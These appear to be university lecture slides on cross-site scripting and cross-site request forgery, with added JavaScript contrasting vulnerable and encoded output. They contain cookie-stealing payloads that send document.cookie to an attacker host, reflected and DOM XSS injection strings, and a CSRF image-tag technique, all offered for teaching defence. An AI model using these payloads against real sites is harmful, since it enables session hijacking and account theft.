Cross-Site Attacks James Walden Northern Kentucky University.

CSC 666: Secure Software Engineering

Cross-Site Attacks
Target the users of the application.
- Use an application feature to reach other users of the application.
- Clients are less well defended than servers.
- Obtain the assets of individual users rather than the assets of the entire application.
Most common type of attack.
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery (CSRF)

Cross-Site Scripting (XSS)
- Attacker causes a legitimate web server to send the user executable content (JavaScript, Flash ActionScript) of the attacker's choosing.
- Impact of XSS:
  - Account hijacking.
  - Browser hijacking (malware hosting).
  - Information leakage (stored form values, etc.).
  - Virtual defacement.

XSS Examples
MySpace worm (October 2005)
- When someone viewed Samy's profile:
  - Set him as a friend of the viewer.
  - Incorporated the code into the viewer's profile.
PayPal (2006)
- XSS redirect used to steal money from PayPal users in a phishing scam.
BBC, CBS (2006)
- By following an XSS link from securitylab.ru, you could read an apparently valid story on the BBC or CBS site claiming that Bush had appointed a 9-year-old as head of the Information Security department.

XSS Key Steps
1. Attacker sends code to the web application.
2. Legitimate user accesses the web app.
3. Web app sends the attacker's code to the user.
4. User's browser executes the code.

XSS Example
The client browser sends an error message to the web server as a URL parameter:
  Sorry%2C+an+error+occurred

XSS Example
The error message is "reflected" back from the web server to the client in a web page.

XSS Example
We can replace the error message with JavaScript:
  alert('xss');

Exploiting the Example
1. User logs in and is issued a cookie.
2. Attacker feeds the user a URL whose error parameter is instead:
   var+i=new+Image;+i.src="cker.com/"%2bdocument.cookie;
   Decoded, this creates an Image whose src is the attacker's URL with the victim's cookie appended, so the victim's browser sends the session cookie to the attacker when it tries to load the image.

Why does XSS Work?
Same-Origin Policy
- The browser only allows JavaScript from site X to access cookies and other data belonging to site X.
- The attacker therefore needs to make the attack script appear to come from site X.
Vulnerable Server Program
- Any program that returns user input in a page without filtering or encoding dangerous content.

Reflected XSS
- Attack scenario:
  - User clicks on a link.
  - Injected script is returned in a one-time response from the vulnerable site.
  - User's browser executes the injected code.
- Limitations:
  - Non-persistent. Only works when the user clicks.
- Most common type of XSS (~75%).

Anatomy of an XSS Attack
1. User logs in to the web server.
2. Web server issues the user a cookie.
3. Attacker prepares the XSS attack.
4. User clicks on the XSS link.
5. Browser requests the XSS URL from the web server.
6. Web server returns the page with the injected code.
7. Browser runs the injected code; the evil site saves the session ID.
8. Attacker hijacks the user's session.

XSS URL Examples
- A parameter value that closes the open attribute and tag, then injects a script:
  "><script>alert(document.cookie)</script>
- A tw= parameter on ge2.html carrying injected scripts, followed by the page's normal parameters:
  ge2.html?tw=<script>alert('Test');</script><script>alert(document.cookie)</script>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1
- A URL-encoded search parameter:
  h_exe?search_text=_%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
  which decodes to _"><script>alert(document.cookie)</script>

Stored XSS
- Injected script is stored in:
  - A post or comment.
  - A review.
  - An uploaded file.
- User views the page containing the injected script.
- The malicious action is taken while the user is logged into the site where the stored script lives.
- Not technically cross-site.
- The attack persists until the injected code is deleted.

DOM-based XSS
Attack scenario:
- User clicks on a URL containing crafted JavaScript.
- The application's client-side code extracts data from the URL and dynamically updates the page with it.
- The user's browser executes the crafted JavaScript that was inserted into the page.
Exploits a vulnerability in client code.
- The server does not reflect or store the evil JavaScript; when the payload sits in the URL fragment (after #), the browser never even sends it to the server.
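The client-side pattern described above, as an added example that is not code from the original slides. It assumes a page.html whose script reads a name= value from the URL fragment and writes a greeting into an element; the parameter name, the greeting text and the hostnames are assumptions. A small element stand-in is used so the code runs under Node; in a browser you would pass document.getElementById(...) instead. The point it shows is the sink: the same value is harmless through textContent and live code through innerHTML, and the server never sees it either way.

```javascript
// Added example (not from the original slides). Assumed page: page.html
// greets the user named in the URL fragment, e.g. page.html#name=Alice.

// Extract the "name" value from the fragment. The fragment is not sent in
// the HTTP request, so server-side filtering cannot catch this payload.
function nameFromFragment(href) {
  const hash = new URL(href).hash.replace(/^#/, '');
  return new URLSearchParams(hash).get('name') ?? 'stranger';
}

// Vulnerable sink: innerHTML parses the value as markup, so an <img onerror>
// or <script> element in the fragment becomes live code in the page.
function greetVulnerable(el, href) {
  el.innerHTML = 'Hello, ' + nameFromFragment(href) + '!';
  return el.innerHTML;
}

// Safe sink: textContent treats the value as text, nothing is parsed.
function greetSafe(el, href) {
  el.textContent = 'Hello, ' + nameFromFragment(href) + '!';
  return el.innerHTML; // what the browser would serialize after the text write
}

// Minimal element stand-in for running outside a browser. It mimics the one
// property that matters here: markup assigned to innerHTML is kept as markup,
// while text assigned to textContent is serialized with & < > escaped, which
// is what a real element's innerHTML getter returns after a textContent write.
function fakeElement() {
  let markup = '';
  const esc = { '&': '&amp;', '<': '&lt;', '>': '&gt;' };
  return {
    set innerHTML(v) { markup = String(v); },
    set textContent(v) { markup = String(v).replace(/[&<>]/g, (c) => esc[c]); },
    get innerHTML() { return markup; },
  };
}

// Does serialized markup contain a real <script> element or an element start
// tag carrying an on* event handler? (Escaped text like &lt;img never matches.)
function hasActiveContent(markup) {
  return /<script\b|<\w+[^>]*\son\w+\s*=/i.test(markup);
}

// Constructed attack URL: the whole payload lives in the fragment.
const DOM_XSS_URL =
  'http://app.example/page.html#name=' +
  encodeURIComponent('<img src=x onerror="alert(document.cookie)">');

if (typeof require !== 'undefined' && require.main === module) {
  console.log('innerHTML  :', greetVulnerable(fakeElement(), DOM_XSS_URL));
  console.log('textContent:', greetSafe(fakeElement(), DOM_XSS_URL));
}
```

The fix is choosing the sink, not filtering the URL: any code path that takes location.hash or location.search into innerHTML, document.write or eval is a DOM XSS sink regardless of what the server does.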

Mitigating XSS
1. Disallow HTML input.
2. Allow only safe HTML tags.
3. Filter (encode) output.
   Replace HTML special characters in output, e.g. replace < with &lt; and > with &gt;; also replace (, ), # and &.
4. Tagged cookies.
   Include the IP address in the cookie and only allow access from the original IP address the cookie was created for.
   This limits replay of a stolen cookie from the attacker's machine; it does not stop script that runs in the victim's own browser with the victim's own address.
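The reflected error-page example from the earlier slides beside the output-encoding fix from step 3 above, as an added example that is not code from the original slides. The page template, the error parameter name and the hostnames app.example and attacker.example are assumptions; the entity set encodes the characters the slide lists (< > & plus ( ) #) and both quote characters.

```javascript
// Added example (not from the original slides): a server-side error page
// that reflects a query parameter, vulnerable and hardened.

// Entity map for output encoding. A single regex pass replaces each character
// exactly once, so & is never double-encoded. Encoding ( ) and # as well, as
// the slide suggests, means injected text cannot even form a function call.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  '(': '&#x28;', ')': '&#x29;', '#': '&#x23;',
};

function escapeHtml(text) {
  return String(text).replace(/[&<>"'()#]/g, (ch) => HTML_ENTITIES[ch]);
}

// Pull the error parameter out of the request URL the way a server would.
// URLSearchParams decodes both %2C and + (form encoding) as the slides use.
function errorParamFromUrl(url) {
  return new URL(url).searchParams.get('error') ?? '';
}

// Vulnerable: the template concatenates the decoded parameter straight into
// the page body. This is exactly what "reflected" means.
function renderErrorPageVulnerable(errorParam) {
  return `<html><body><p>Error: ${errorParam}</p></body></html>`;
}

// Hardened: same template, but every untrusted value is encoded for the HTML
// body context before it is inserted.
function renderErrorPageSafe(errorParam) {
  return `<html><body><p>Error: ${escapeHtml(errorParam)}</p></body></html>`;
}

// Crude check used in the demo: does the page contain an unencoded <script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed inputs: the benign request from the slides, and the slides'
// cookie-stealing payload URL-encoded as a browser would send it.
const BENIGN_URL = 'http://app.example/error?error=Sorry%2C+an+error+occurred';
const ATTACK_URL =
  'http://app.example/error?error=' +
  encodeURIComponent(
    '<script>var i=new Image;i.src="http://attacker.example/"+document.cookie;</script>'
  );

if (typeof require !== 'undefined' && require.main === module) {
  for (const url of [BENIGN_URL, ATTACK_URL]) {
    const param = errorParamFromUrl(url);
    console.log('vulnerable:', renderErrorPageVulnerable(param));
    console.log('safe      :', renderErrorPageSafe(param));
  }
}
```

escapeHtml is correct for text placed in an HTML element body, which is the case in this example. A value dropped into a JavaScript string, a URL or an event-handler attribute needs the encoding for that context instead; one encoder does not cover every place a template can put user data.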

Cross-Site Request Forgery
A confused deputy attack.
- Exploits the trust the application places in an authenticated session.
Attack scenario:
- User authenticates to the web application.
- User browses to another site containing a malicious CSRF attack link to the web app.
  - iframe, img, link, bgsound, etc.
- The browser accesses the web app with the cached credentials (the session cookie), performing whatever action the link specifies.

Why is the Application Fooled?
- The browser sends the same GET request whether:
  - The user submits a form.
  - The browser fetches an iframe or img src, etc.
- The browser sends cookies with any GET request to the matching domain + path.
- The same-origin policy restricts reading the responses of frames and XHRs; it does not stop the browser from sending a cross-site request triggered by an HTML tag.

Example: DSL Modem Attack
- Home network devices are administered via web apps.
- Standard local IPs.
- Attacker inserts a 1-pixel img tag on a page.
- Its src is the URL of the form submission that grants remote administration.
- No password needed.
- The software's owner assumed the device was on a trusted local network.
- Of course, the browser is on the local network too.

Mitigating CSRF
Require POST for data modifications, but:
- Many frameworks automatically fetch both types of parameters or convert one to the other.
- Hidden POST requests can be created with scripts (e.g. an auto-submitting form on the attacker's page).
Check the Referer header.
- But users can block or forge the Referer header, so it cannot be relied on for everyone.
Use nonces.
- A random token is inserted as a hidden parameter, and thus submitted with the form.
- But XSS can read the form, so a combined XSS + CSRF attack can bypass this defense.

Mitigating CSRF
Re-authenticate for high-value transactions.
- Use out-of-band authentication if possible.
Expire session IDs quickly.
- But there will always be some time period in which a CSRF attack will work.
Automate defenses with tools.
- CSRFGuard to insert nonces.
- CSRFTester to verify the application.
